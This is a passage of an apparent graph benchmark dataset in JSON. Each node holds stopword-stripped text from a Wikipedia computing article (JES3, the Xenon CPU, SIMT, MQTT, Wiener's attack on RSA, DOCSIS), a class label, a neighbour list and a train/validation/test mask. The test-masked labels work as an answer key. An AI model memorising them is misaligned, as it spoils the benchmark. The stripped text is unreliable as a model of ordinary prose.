support local asp lasp processor serves local main capabilities standard final asp version version 3 support os/vs2 svs introduction mvs system/370 ibm rewrote renamed asp job entry subsystem 3 jes3 still use 2015",
    "neighbors": [
      868,
      11236,
      3916,
      7053,
      5936,
      4535,
      2813
    ],
    "mask": "None"
  },
  {
    "node_id": 341,
    "label": 2,
    "text": "DSOS:dsos dsos deep six operating system real-time operating system sometimes referred operating system kernel developed texas instruments geophysical services division gsi mid-1970s geophysical services division texas instruments main business search oil would collect data likely spots around world process data using high performance computers produce analyses guided oil companies toward promising sites drilling much oil sought found beneath ocean hence gsi maintained fleet ships collect seismic data remote regions world order properly essential ships navigated precisely find evidence oil ca n't mark x tree oil thousands feet ocean typically hundreds miles land decade gps existed thus processing load keep accurate picture considerable geonav systems used dsos frailey 1975 operating system performed required navigation addition collected processed stored seismic data received real-time name deep six operating system brainchild phil ward subsequently world-renowned gps expert time manager project slightly skeptical computer science professor dennis frailey insisted operating system solution problem hand sense system lived name according legend supposedly one ships hit old world war ii sea mine coast egypt sank navigated geonav dsos 1970s real-time applications use operating systems latter perceived adding much overhead typical computers time barely enough computing power handle tasks hand moreover software type written assembly language consequence real-time systems classic examples spaghetti code complex masses assembly language software using sorts machine-dependent tricks achieve maximum performance dsos ran texas instruments 980 minicomputer used marine navigation gsi fleet dsos created bring order chaos typical real-time system design time 980 time relatively powerful small computer offered memory protection multiple-priority interrupt capabilities dsos designed exploit features dsos frailey 1975 one pioneering efforts real-time operating systems incorporating many principles introduced time mainframe systems semaphores memory management task management software interrupts used clever scheme assure appropriate real-time performance providing many services previously uncommon real-time domain orderly way communicate external devices computer operators multitasking maintenance records disciplined form inter-task communication reliable real-time clock memory protection debugging support remained use least three decades demonstrated well designed operating system actually make real-time system faster vastly maintainable typical today almost real-time applications use operating systems type",
    "neighbors": [
      10883,
      6276,
      9366,
      7319,
      2201,
      9628,
      10030,
      7983,
      6207,
      321,
      10561,
      1221,
      9927,
      1480,
      6985,
      9162,
      477,
      10590,
      6624,
      5603,
      5220,
      1253,
      1126,
      8551,
      10482,
      11383
    ],
    "mask": "Validation"
  },
  {
    "node_id": 342,
    "label": 3,
    "text": "Xenon_(processor):xenon processor microsoft xcpu codenamed xenon cpu used xbox 360 game console used ati xenos graphics chip processor developed microsoft ibm ibm chip program codenamed waternoose named henry j. waternoose iii monsters inc. development program originally announced 2003-11-03 processor based ibm powerpc instruction set architecture consists three independent processor cores single die cores slightly modified versions ppe cell processor used playstation 3 core two symmetric hardware threads smt total six hardware threads available games individual core also includes 32 kib l1 instruction cache 32 kib l1 data cache xcpu processors manufactured ibm east fishkill new york fabrication plant chartered semiconductor manufacturing part globalfoundries singapore chartered reduced fabrication process 2007 65 nm 90 nm thus reducing manufacturing costs microsoft xbox 360 introduced xcgpu integrated xenon cpu xenos gpu onto die edram package xcgpu follows trend started integrated ee+gs playstation 2 slimline combining cpu gpu memory controllers io single cost-reduced chip also contains front side bus replacement block connects cpu gpu internally exactly manner front side bus would done cpu gpu separate chips xcgpu n't change hardware characteristics xbox 360 xcgpu contains 372 million transistors manufactured globalfoundries 45 nm process compared original chipset xbox 360 combined power requirements reduced 60 physical chip area 50 illustrations different generations processors xbox 360 xbox 360",
    "neighbors": [
      6663,
      5642,
      1548,
      1563,
      7218,
      6715,
      10316,
      6738,
      9812,
      9302,
      1635,
      3175,
      3185,
      4211,
      5235,
      1148,
      643,
      4743,
      6797,
      6311,
      9391,
      5297,
      1725,
      9434,
      6878,
      8931,
      740,
      9445,
      8937,
      10985,
      5358,
      1776,
      1784,
      3323,
      6909,
      9472,
      6914,
      4868,
      10501,
      3846,
      6926,
      4881,
      1309,
      6949,
      1321,
      10543,
      306,
      9020,
      9033,
      336,
      8530,
      859,
      11613,
      869,
      6004,
      8058,
      2943,
      9095,
      1933,
      3472,
      7065,
      3493,
      8102,
      4017,
      10675,
      6072,
      8120,
      1983,
      1985,
      10180,
      3025,
      3540,
      2525,
      10214,
      4587,
      10734,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 343,
    "label": 3,
    "text": "Launch_Time:launch time launch time new concept handling ethernet packets proposed linux kernel attempt add isochronous capability kernel hinting time packet sent sending packet socket additional bit msg_launchtime specified sendto flags field bit set buffer passed socket includes desired send time launch time sendto syscall shave launchtime packet add msghdr passed lower layers network stack udp ipv4/ipv6 planned extended support launchtime requested try call new send message routine network driver allows passing launchtime parameter addition normal send message present driver launch time used network driver initialized using ioctl network controllers support launchtime today intel i210 gigabit ethernet controller support igb driver december 2012 launch time supported fpga based network cards common tcp/ip offload engines support launch time endace dag cards exception support linux networking using normal network stack using proprietary api linux_igb_avb project sourceforge support launch time user space applications",
    "neighbors": [
      10853,
      4589,
      3886,
      3637,
      11413,
      5469,
      5470
    ],
    "mask": "None"
  },
  {
    "node_id": 344,
    "label": 3,
    "text": "Single_instruction,_multiple_threads:single instruction multiple threads single instruction multiple thread simt execution model used parallel computing single instruction multiple data simd combined multithreading processors say number seem execute many tasks achieved processor multiple threads work-items sequence simd lane operations execute lock-step analogous simd lanes simt execution model implemented several gpus relevant general-purpose computing graphics processing units gpgpu e.g supercomputers combine cpus gpus simt introduced nvidia ati technologies amd released competing product slightly later may 14 2007 terascale 1-based r600 gpu chip access time widespread ram types e.g ddr sdram gddr sdram xdr dram etc still relatively high engineers came idea hide latency inevitably comes memory access strictly latency-hiding feature zero-overhead scheduling implemented modern gpus might might considered property 'simt simt intended limit instruction fetching overhead i.e latency comes memory access used modern gpus nvidia amd combination 'latency hiding enable high-performance execution despite considerable latency memory-access operations processor oversubscribed computation tasks able quickly switch tasks would otherwise wait memory strategy comparable multithreading cpus confused multi-core downside simt execution fact thread-specific control-flow performed using masking leading poor utilization processor threads follow different control-flow paths instance handle else block various threads processor execute different paths threads must actually process paths threads processor always execute lock-step masking used disable enable various threads appropriate masking avoided control flow coherent threads processor i.e follow path execution masking strategy distinguishes simt ordinary simd benefit inexpensive synchronization threads processor",
    "neighbors": [
      7173,
      9739,
      9741,
      7699,
      5655,
      10781,
      2594,
      8231,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      1614,
      2638,
      2140,
      1122,
      4194,
      3175,
      5223,
      8810,
      4205,
      8815,
      630,
      6774,
      8822,
      7802,
      7313,
      6815,
      8352,
      5793,
      2210,
      6818,
      6821,
      5798,
      7852,
      9391,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      5329,
      4308,
      10966,
      2264,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      6909,
      8447,
      1798,
      6926,
      6415,
      785,
      1298,
      2838,
      2850,
      6950,
      2345,
      309,
      8501,
      5948,
      7998,
      4928,
      8514,
      5956,
      4423,
      7497,
      330,
      1866,
      6476,
      2383,
      7505,
      9044,
      11604,
      2394,
      6495,
      1376,
      8543,
      11618,
      1387,
      876,
      10603,
      11630,
      4465,
      1399,
      7033,
      1402,
      11130,
      3457,
      398,
      3470,
      5523,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      7607,
      4030,
      3014,
      1480,
      466,
      2008,
      1499,
      1502,
      5090,
      995,
      2536,
      9707,
      10734,
      6639,
      499,
      4596,
      508
    ],
    "mask": "Test"
  },
  {
    "node_id": 345,
    "label": 9,
    "text": "ConTeXt:context context general-purpose document processor especially suited structured documents automated document production fine typography multi-lingual typesetting based part tex typesetting system uses document markup language manuscript preparation typographical automated capabilities context extensive including interfaces handling microtypography multiple footnotes footnote classes manipulating opentype fonts features moreover offers extensive support colors backgrounds hyperlinks presentations figure-text integration conditional compilation gives user extensive control formatting making easy create new layouts styles without learning low-level tex macro language context may compared contrasted latex primary thrust two rather distinct context ground typography typesetting system meant provide users easy consistent access advanced typographical control—important general-purpose typesetting tasks original vision latex insulate user typographical decisions—a useful approach submitting e.g articles scientific journal latex evolved original vision time context unified design avoids package clashes happen latex context provides multi-lingual user interface support markup english dutch german french italian support output many languages including western european eastern european arabic-script chinese japanese korean also allows user use different tex engines like pdftex xetex luatex without changing user interface native drawing engine context integrates superset metapost called metafun allows users use drawing abilities metapost page backgrounds ornaments metafun also used stand alone metapost context also supports use external drawing engines like pgf/tikz pstricks context also provides macro package typesetting chemical structure diagrams tex called ppchtex well many modules package also used plain tex latex originally entitled pragmatex context given name around 1996. hans hagen pragma advanced document engineering pragma ade netherlands-based company context free software program code i.e anything codice_1 subtree distributed gnu gpl documentation provided creative commons attribution noncommercial sharealike license context official manual 2001 context official mini tutorial 1999 documents copyrighted pragma repository future new manual released gnu free documentation license april 2009 up-to-date version fonts typography chapters mark iv abbreviated mkiv current version context development version new features added constantly although fully usable also frozen version called mark ii abbreviated mkii still maintained main difference mkii mkiv mkiv based luatex engine mkii based pdftex xetex although one could select tex engine used context documents describing necessity change process carried benefits minor differences mkii mkiv apart new features mkiv changes code mkii mkiv visible user interface syntax document level mkiv mkii released time oldest version context mark low-level code written dutch unmaintained context created hans hagen ton otten pragma ade netherlands around 1991 due need educational typesetting material around 1996 hans hagen coined name context meaning text tex con-tex-t con latin preposition meaning together 1996 context used within pragma ade 1996 began adopted wider audience first users outside pragma taco hoekwater berend de boer gilbert van den dobbelsteen first user outside netherlands tobias burnus july 2004 contextgarden.net wiki page created context low-level code originally written dutch around 2005 context developers began translating english resulting version known mkii stable frozen august 2007 hans hagen presented mkiv version first public beta released later year context user meeting 2008 mojca miklavec presented context minimals distribution context containing latest binaries intended small memory footprint thus demanding less bandwidth updates august 2008 distribution registered project launchpad web site june 2008 patrick gundlach wrote first post context blog july 2009 context started git repository november 2010 context group created april 2019 lmtx context luametatex announced making context documents simple one makes plain text file typically .tex extension compiles codice_2 script result process pdf file context also generate dvi file example shown",
    "neighbors": [
      1347,
      9192,
      73,
      9,
      7983,
      11023,
      7539,
      4564,
      8627,
      319
    ],
    "mask": "Test"
  },
  {
    "node_id": 346,
    "label": 6,
    "text": "List_of_log-structured_file_systems:list log-structured file systems list log-structured file system implementations kinds storage media flash memory cd-rw slowly degrade written limited number erase/write cycles one location log-structured file systems sometimes used media make fewer in-place writes thus prolong life device wear leveling common file systems include",
    "neighbors": [
      5120,
      2564,
      9220,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      5661,
      9249,
      9762,
      5158,
      7225,
      11323,
      8772,
      1109,
      4708,
      9836,
      7789,
      9333,
      6263,
      9335,
      633,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      3267,
      10951,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      823,
      6970,
      11072,
      3909,
      2378,
      4431,
      5969,
      2395,
      2397,
      7005,
      10596,
      2407,
      10087,
      11638,
      6519,
      376,
      11128,
      890,
      7554,
      8075,
      7565,
      6545,
      5013,
      11675,
      11676,
      414,
      2974,
      7070,
      10151,
      4012,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      8643,
      7126,
      2015,
      1509,
      9189,
      7663,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 347,
    "label": 1,
    "text": "Weak_entity:weak entity relational database weak entity entity uniquely identified attributes alone therefore must use foreign key conjunction attributes create primary key foreign key typically primary key entity related entity relationship diagrams er diagrams weak entity set indicated bold double-lined rectangle entity connected bold double-lined type arrow bold double-lined diamond relationship type relationship called identifying relationship idef1x notation represented oval entity rather square entity base tables identifying relationship one primary key populated child weak entity primary key entity general though necessarily weak entity items primary key inherited primary key sequence number two types weak entities associative entities subtype entities latter represents crucial type normalization super-type entity inherits attributes subtype entities based value discriminator idef1x government standard capturing requirements possible sub-type relationships classic example weak entity without sub-type relationship would header/detail records many real world situations claims orders invoices header captures information common across forms detail captures information specific individual items standard example complete subtype relationship party entity given discriminator party type could individual partnership c corporation sub chapter association association governmental unit quasi-governmental agency two subtype entities person contains individual-specific information first last name date birth organization would contain attributes legal name organizational hierarchies cost centers sub-type relationships rendered database super-type becomes referred base table sub-types considered derived tables correspond weak entities referential integrity enforced via cascading updates deletes consider database records customer orders order one items enterprise sells database would contain table identifying customers customer number primary key another identifying products sold product number primary key would contain pair tables describing orders one tables could called orders would order number primary key identify order uniquely would contain customer number foreign key identify products sold plus information date time order placed paid shipped table could called orderitem would identified compound key consisting order number foreign key item line number non-primary key attributes product number foreign key ordered quantity price discount special options may zero one many orderitem entries corresponding order entry orderitem entry exist unless corresponding order entry exists zero orderitem case normally applies transiently order first entered first ordered item recorded orderitem table stores weak entities precisely orderitem meaning independent order might argue orderitem meaning records time identified record somebody identified record ordered certain quantity certain product information might use limited use example soon want find seasonal geographical trends sales item need information related order record order would exist without product person create order could argued order would described weak entity products ordered would multivalue attribute order",
    "neighbors": [
      11457,
      10628,
      9286,
      7080,
      4393,
      3004,
      10632,
      9596
    ],
    "mask": "Test"
  },
  {
    "node_id": 348,
    "label": 9,
    "text": "Qore_(programming_language):qore programming language qore interpreted high-level general-purpose garbage collected dynamic programming language featuring support code embedding sandboxing optional strong typing focus fundamental support multithreading smp scalability qore unique interpreted scripting language fundamental support multithreading meaning one part code run time additionally features automatic memory management meaning programmers allocate free memory explicitly also supporting raii idiom destructors scope-based resource management exception-safe programming due qore unique prompt collection implementation garbage collection qore scripts typically following extensions executable qore scripts unix-like operating systems typically start hashbang specify filename interpreter follows codice_4 qore syntax similar inspired following programming languages basic types include codice_23 codice_24 codice_25 codice_26 codice_27 codice_28 codice_29 codice_30 associative arrays codice_31 well code codice_32 code used data type complex types also supported codice_33 codice_34 codice_35 well type-safe hashes despite interpreted language qore designed support multithreading fundamental design principle elements qore thread-safe language general designed smp scalability mind elements language designed support multithreading qore programs scripts limit subset qore functionality also global interpreter lock qore threading functionality qore provided operating system posix threads library qore features unique garbage collection approach called prompt collection allows destructors run immediately objects go scope even recursive references back allows qore support raii idiom also perform garbage collected automatic memory management qore designed support embedding sandboxing logic applications also applies applications written qore well applications using qore library public c++ api using codice_36 class represents logic container sandboxing controls discrete objects created destroyed runtime containing embedded code extend modify behavior application user-defined ways qore standard runtime library supports data mapping apis communicating databases including high-level apis sql operations schema management dba actions client apis server infrastructure implementations many protocols including http rest rest schema validation/code generation including swagger support client/server soap support including code message generation websocket rpc protocols generic connector apis generic data mapping apis many file format file- data-exchange protocols qore supports testing qunit module facilitates automated testing continuous integration processes code written qore qore git software repository hosted github binary packages available rpm macports freebsd ports well operating systems including microsoft windows see general source download info qore wiki information",
    "neighbors": [
      2304,
      9345,
      8582,
      6797,
      9487,
      5397,
      3876,
      5165,
      5677,
      7983,
      1591,
      5819,
      4797,
      9441,
      9834,
      5612,
      11632,
      9330,
      9714,
      10486,
      6527
    ],
    "mask": "Test"
  },
  {
    "node_id": 349,
    "label": 5,
    "text": "Comparison_of_MQTT_implementations:comparison mqtt implementations mqtt mq telemetry transport message queuing telemetry transport iso standard iso/iec prf 20922 publish-subscribe-based messaging protocol works top tcp/ip protocol designed connections remote locations small code footprint required network bandwidth limited publish-subscribe messaging pattern requires message broker comparison categories use stable version implementation listed overview section comparison limited features relate mqtt protocol following table lists mqtt libraries implementations along general information complete list mqtt implementations found github several versions mqtt protocol currently standardized list containing recent versions mqtt protocol organization standardized following table lists versions mqtt implementation supports also lists support ssl/tls tcp security provided ssl/tls may desirable depending type traffic sent devices mqtt transmits messages clear mqtt page qos quality service described quality service refers traffic prioritization resource reservation control mechanisms rather achieved service quality quality service ability provide different priority different applications users data flows guarantee certain level performance data flow.a description qos level found following table lists implementation support qos levels portability concerns section refers technical details may deciding factors selecting implementation use general table used knowledge device using following table shows various requirements may useful deciding implementation use device",
    "neighbors": [
      3462,
      9225,
      6797,
      9365,
      1435,
      9245,
      3102,
      5031,
      10924,
      5677,
      4398,
      823,
      1849,
      2910,
      8554,
      5872,
      4979,
      5492,
      3573,
      8439,
      6522,
      3323,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 350,
    "label": 2,
    "text": "NeXTdimension:nextdimension nextdimension nd accelerated 32-bit colour board manufactured sold next 1991 gave nextcube colour capabilities postscript planned nextbus nubus like implementation card full size card nextcube filling one four slots another one filled main board nextdimension featured s-video input output rgb output intel i860 64-bit risc processor 33 mhz postscript acceleration 256mb ram main memory 4mb vram resolution 1120*832 24-bit colour plus 8-bit alpha channel onboard c-cube cl550 chip mjpeg video compression announced never shipped handful engineering prototypes mjpeg daughterboard exist none actually function stripped mach kernel used operating system card due supporting processor 32-bit colour nextdimension faster 2-bit greyscale display postscript nextcube display postscript never actually ran board intel i860 never much move blocks colour data around motorola 68040 crunching board fast time never lived hype since main board always included greyscale video logic nextdimension allowed simultaneous use additional monitor list price nextdimension sold add-on nextcube us 3,995",
    "neighbors": [
      10406,
      7305,
      2282,
      3563,
      7307,
      7561,
      6554,
      8628,
      7640,
      6234,
      11420,
      7806
    ],
    "mask": "Test"
  },
  {
    "node_id": 351,
    "label": 8,
    "text": "Avinash_Kaushik:avinash kaushik avinash kaushik indian entrepreneur author public speaker writing speaking kaushik championed principle aggregation marginal gains encouraged pursuit simplifying perceived complexity field data analytics kaushik advisory board university toronto rotman school management program crm excellence well advisory board university california irvine program web intelligence also associate instructor university british columbia web analytics program kaushik delivered keynotes conferences art marketing emetrics marketing optimization summit cma next jmp innovators summit kaushik received 2009 harry v roberts statistical advocate year award american statistical association 2011 influential industry contributor award web analytics association 2008 kaushik co-founded market motive inc. provides online education certification six internet disciplines search engine optimization paid search advertising social media web analytics conversion public relations",
    "neighbors": [
      6576
    ],
    "mask": "Test"
  },
  {
    "node_id": 352,
    "label": 2,
    "text": "NxtOSEK:nxtosek nxtosek real-time operating system rtos lego mindstorms programmable nxt controller nxtosek consists i/o driver part lejos nxj toppers osek rtos glue code nxtosek enables lego mindstorms nxt robots programmed ansi-c/c++",
    "neighbors": [
      9938,
      10964,
      9831
    ],
    "mask": "Test"
  },
  {
    "node_id": 353,
    "label": 4,
    "text": "Privacy_platform:privacy platform privacy platform often refers software systems designed way retain privacy users operators",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 354,
    "label": 7,
    "text": "Alibaba_Cloud_ECS:alibaba cloud ecs alibaba cloud elastic compute service ecs one core components alibaba cloud – cloud computing ecosystem alibaba group ecs type cloud computing solution features elastic processing capabilities ecs simpler efficient management mode physical servers creation instances change os add release number ecs instances time fit business needs ecs instance virtual computing environment includes cpu memory basic computing components instance core component ecs actual operating entity offered alibaba cloud resources disks images snapshots used conjunction ecs instance alibaba cloud regions physical locations data centers spread world reduce network latency region changed resource created following table lists alibaba cloud regions corresponding cities region ids",
    "neighbors": [
      11097,
      4194,
      7983,
      5295
    ],
    "mask": "Test"
  },
  {
    "node_id": 355,
    "label": 5,
    "text": "Carrier_recovery:carrier recovery carrier recovery system circuit used estimate compensate frequency phase differences received signal carrier wave receiver local oscillator purpose coherent demodulation transmitter communications carrier system carrier wave modulated baseband signal receiver baseband information extracted incoming modulated waveform ideal communications system carrier signal oscillators transmitter receiver would perfectly matched frequency phase thereby permitting perfect coherent demodulation modulated baseband signal however transmitters receivers rarely share carrier oscillator communications receiver systems usually independent transmitting systems contain oscillators frequency phase offsets instabilities doppler shift may also contribute frequency differences mobile radio frequency communications systems frequency phase variations must estimated using information received signal reproduce recover carrier signal receiver permit coherent demodulation quiet carrier signal containing dominant carrier spectral line carrier recovery accomplished simple band-pass filter carrier frequency phase-locked loop however many modulation schemes make simple approach impractical signal power devoted modulation—where information present—and carrier frequency reducing carrier power results greater transmitter efficiency different methods must employed recover carrier conditions non-data-aided/ blind carrier recovery methods rely knowledge modulation symbols typically used simple carrier recovery schemes initial method coarse carrier frequency recovery closed-loop non-data-aided systems frequently maximum likelihood frequency error detectors method non-data-aided carrier recovery non-linear operation frequency multiplier applied modulated signal create harmonics carrier frequency modulation removed carrier harmonic band-pass filtered frequency divided recover carrier frequency may followed pll multiply-filter-divide example open-loop carrier recovery favored burst transactions burst mode clock data recovery since acquisition time typically shorter close-loop synchronizers phase-offset/delay multiply-filter-divide system known compensated recover correct phase practice applying phase compensation difficult general order modulation matches order nonlinear operator required produce clean carrier harmonic example consider bpsk signal recover rf carrier frequency formula_1 squaring produces signal twice rf carrier frequency phase modulation modulo formula_3 phase effectively 0 modulation qpsk signal take fourth power two terms plus dc component produced appropriate filter around formula_5 recovers frequency carrier frequency phase recovery well demodulation accomplished using costas loop appropriate order costas loop cousin pll uses coherent quadrature signals measure phase error phase error used discipline loop oscillator quadrature signals properly aligned/recovered also successfully demodulate signal costas loop carrier recovery may used m-ary psk modulation scheme one costas loop inherent shortcomings 360/m degree phase ambiguity present demodulated output start carrier recovery process possible achieve symbol synchronization prior full carrier recovery symbol timing determined without knowledge carrier phase carrier minor frequency variation/offset decision directed carrier recovery output symbol decoder fed comparison circuit phase difference/error decoded symbol received signal used discipline local oscillator decision directed methods suited synchronizing frequency differences less symbol rate comparisons performed symbols near symbol rate frequency recovery methods may necessary achieve initial frequency acquisition common form decision directed carrier recovery begins quadrature phase correlators producing in-phase quadrature signals representing symbol coordinate complex plane point correspond location modulation constellation diagram phase error received value nearest/decoded symbol calculated using arc tangent approximation however arc tangent compute phase correction 0 formula_6 qam constellations also formula_6 phase symmetry shortcomings came overcome use differential coding low snr conditions symbol decoder make errors frequently exclusively using corner symbols rectangular constellations giving weight versus lower snr symbols reduces impact low snr decision errors",
    "neighbors": [
      2787
    ],
    "mask": "Validation"
  },
  {
    "node_id": 356,
    "label": 9,
    "text": "NWScript:nwscript nwscript scripting language developed bioware role-playing video game neverwinter nights based c programming language implemented aurora toolset neverscript open source 3rd party editor created mac os x linux versions nwn aurora toolset ported platforms nwscript also used video games witcher use odyssey engine neverwinter nights 2 sequel original nwn features modified version scripting language based c nwscript many functions c family excluding logical binary ternary operators mathematical functions function source code accessible end-user correct syntax defined script file called nwscript.nss users create functions included scripts include directive works slightly differently c++ nwscript way directly target screen output instead instance in-game characters player character made speak typical hello world example message script puts hello world message player message log work placed oncliententer event module properties first line void main function function nwscript start third line text hello world sent player in-game message log nwscript allows structs objects following common data types available nwscript nwscript also introduced data types purposes neverwinter nights game saving script aurora toolset saves plain text script file .nss filename extension compiling script .ncs containing bytecode run nwscript virtual machine file created turned debug information file .ndb extension also created game uses .ncs file .ndb file called saving created module files packed single module file .mod extension along information layout module",
    "neighbors": [
      1952,
      10145,
      5677,
      823,
      6797,
      7983,
      9871,
      9780,
      3607,
      2045
    ],
    "mask": "Train"
  },
  {
    "node_id": 357,
    "label": 4,
    "text": "Certified_Ethical_Hacker:certified ethical hacker certified ethical hacker ceh qualification obtained demonstrating knowledge assessing security computer systems looking weaknesses vulnerabilities target systems using knowledge tools malicious hacker lawful legitimate manner assess security posture target system knowledge assessed answering multiple choice questions regarding various ethical hacking techniques tools code c|eh exam 312-50 certification made baseline progression c|eh practical launched march 2018 test penetration testing skills lab environment candidate must demonstrate ability apply techniques use penetration testing tools compromise various simulated systems within virtual environment ethical hackers employed organizations penetrate networks computer systems purpose finding fixing security vulnerabilities ec-council offers another certification known certified network defense architect cnda certification designed united states government agencies available members selected agencies including private government contractors primarily compliance dod directive 8570.01-m also ansi accredited recognized gchq certified training gct c|eh part ec-council ’ vapt certification track progresses c|eh practical ec-council certified security analyst ecsa ecsa practical finally advanced penetration test licensed penetration tester master certification achieved taking c|eh examination either attended training accredited training center atc completed ec-council ’ learning portal iclass candidate opts self-study application must filled proof submitted two years relevant information security work experience without required two years information security related work experience request consideration educational background current version c|eh v10 uses ec-council exam code 312-50 earlier versions although new version v10 recently launched exam 125 multiple-choice questions 4-hour time limit ec-council various atcs accredited training center administer c|eh examination members holding c|eh/cnda designation well ec-council certifications must seek re-certification program every three years minimum 120 credits c|eh focuses latest malware attacks latest hacking tools new emerging attack vectors cyberspace includes hacking challenges end every module built 100 compliance nice 2.0 framework ensure systematic job role mapping c|eh also accredited american national standard institute received gct gchq certified training accreditation recognized certification dod ’ computer network defense service providers cnd-sp ’ specialized personnel classification within united states department defense ’ information assurance workforce among many recognitions",
    "neighbors": [
      11576,
      10307,
      357,
      101,
      8613,
      9607,
      8462,
      5010,
      4595,
      6834,
      917,
      1493,
      3447,
      7798,
      6105,
      316,
      10717,
      1182
    ],
    "mask": "None"
  },
  {
    "node_id": 358,
    "label": 4,
    "text": "Lars_Eilebrecht:lars eilebrecht lars eilebrecht born march 1972 german software engineer solutions architect security expert open source evangelist one original developers apache http server co-founder former vice president apache software foundation lars independent consultant based london united kingdom lars active open software projects notably apache http server project member apache group co-founder member apache software foundation since beginning apache software foundation member conferences committee helping foundation organise apachecon events served vice president conference planning 2007 2009 additionally member asf security team asf public relations committee lars open source evangelist received o'reilly appaloosa award raising awareness apache since 2008 lars works independent consultant worked companies bbc channel 4 heise media el tiempo lars owner managing director primevation ltd partner plixos gmbh previous employers lars eilebrecht include ciphire labs quam parc technologies cybersolutions cable wireless lars interest security cryptography director security solutions chief security architect ciphire labs speaker conferences financial cryptography data security 21st chaos communication congress 21c3 lars member international financial cryptography association 2005 2006 1998 lars received master science degree computer engineering university siegen germany lars author apache webserver first german-language book apache http server published 5 editions book 1997 2003",
    "neighbors": [
      865
    ],
    "mask": "Test"
  },
  {
    "node_id": 359,
    "label": 3,
    "text": "PlayStation_2_Headset:playstation 2 headset playstation 2 headset usb headset used playstation 2 original headset produced logitech distributed headsets support usb-audio class may compatible playstation 2 headset also used pcs standard usb headset drivers required windows mac os x linux headset commonly used online multiplayer games however also used karaoke style games voice control enhance immersive experience single player games",
    "neighbors": [
      643,
      9091,
      3077,
      11398,
      10761,
      6797,
      6799,
      9508,
      6311,
      9512,
      684,
      306,
      1587,
      823,
      1091,
      9543,
      10056,
      6732,
      10316,
      6738,
      6873,
      859,
      4060,
      607,
      8937,
      3824,
      5746,
      7028,
      7801,
      8316,
      6781
    ],
    "mask": "Validation"
  },
  {
    "node_id": 360,
    "label": 4,
    "text": "Wiener's_attack:wiener attack wiener attack named cryptologist michael j. wiener type cryptographic attack rsa attack uses continued fraction method expose private key small fictional characters alice bob people want communicate securely specifically alice wants send message bob bob read first bob chooses two primes p q calculates rsa modulus n pq rsa modulus made public together encryption exponent e n e form public key pair e n making information public anyone encrypt messages bob decryption exponent satisfies formula_1 formula_2 euler ’ phi function note order multiplicative group formula_3 encryption exponent e formula_4 also must relatively prime modular inverse factorization n private key kept secret bob decrypt message denote private key pair n encryption message given formula_5 decryption cipher text formula_6 given formula_7 using fermat little theorem using euclidean algorithm one efficiently recover secret key one knows factorization n. secret key one efficiently factor modulus n rsa cryptosystem bob might tend use small value rather large random number improve rsa decryption performance however wiener ’ attack shows choosing small value result insecure system attacker recover secret information i.e. break rsa system break based wiener ’ theorem holds small values wiener proved attacker may efficiently find formula_8 wiener paper also presented countermeasures attack allow fast decryption two techniques described follows choosing large public key replace formula_9 formula_10 formula_11 large formula_12 formula_10 large enough i.e formula_14 wiener ’ attack applied regardless small formula_15 using chinese remainder theorem suppose one chooses formula_16 formula_17 small formula_18 fast decryption formula_19 done follows 1 first compute formula_20 formula_21 2 use chinese remainder theorem compute unique value formula_22 satisfies formula_23 formula_24 result formula_25 satisfies formula_26 needed point wiener ’ attack apply value formula_27 large since exists integer k define formula_30 substituted equation gives defining formula_32 formula_33 substituting gives divided formula_35 formula_38 slightly smaller formula_39 former composed entirely public information however method checking guess still required assuming formula_40 reasonable assumption unless formula_41 large last equation may written using simple algebraic manipulations identities guess checked accuracy let formula_43 formula_44 let formula_45 given formula_46 formula_47 attacker efficiently recover formula_18 suppose public keys formula_49 attack shall determine formula_15 using wiener theorem continued fractions approximate formula_18 first try find continued fractions expansion formula_52 note algorithm finds fractions lowest terms know according continued fractions expansion formula_52 convergents formula_55 verify first convergent produce factorization formula_57 however convergent formula_58 yields solve equation find roots formula_63 therefore found factorization notice modulus formula_65 wiener theorem work proof based approximations using continued fractions since formula_67 exists formula_68 formula_69 therefore hence formula_71 approximation formula_72 although attacker know formula_73 may use formula_74 approximate indeed since formula_75 formula_76 using formula_57 place formula_73 obtain formula_85 formula_86 since formula_87 formula_88 obtain since formula_91 formula_92 hence obtain since formula_94 formula_95 obtain 1 2 conclude theorem condition satisfied formula_55 appears among convergents formula_100 therefore algorithm indeed eventually find formula_55",
    "neighbors": [
      3629
    ],
    "mask": "Test"
  },
  {
    "node_id": 361,
    "label": 5,
    "text": "DOCSIS:docsis data cable service interface specification docsis international telecommunications standard permits addition high-bandwidth data transfer existing cable television catv system used many cable television operators provide internet access see cable internet existing hybrid fiber-coaxial hfc infrastructure version numbers sometimes prefixed simply instead docsis e.g d3 docsis 3 docsis developed cablelabs contributing companies including 3com arris bigband networks broadcom cisco comcast conexant correlant cox harmonic hitron technologies intel motorola netgear technicolor terayon time warner cable texas instruments cross-version compatibility maintained across versions docsis devices falling back highest supported version common endpoints cable modem cm cable modem termination system cmts example one cable modem supports docsis 1.0 system running 2.0 connection established docsis 1.0 data rates 2010 u.s. federal communications commission fcc urged u.s. providers make 100 mbit/s standard bandwidth available 100 million households 2020 1994 802.14 chartered develop media access control hfc 1995 multimedia cable network system mcns formed original partners tci time warner comcast cox later continental rogers joined group june 1996 scte formed data standards subcommittee begin work establishing national standards high-speed data cable plant july 1997 scte dss voted affirmative document dss 97-2 standard based well-known docsis specification standard also submitted international telecommunications union telecommunications standardization sector itu-t adopted itu-t j.112 annex b frequency allocation bandwidth plans differ united states european catv systems docsis standards earlier 3.1 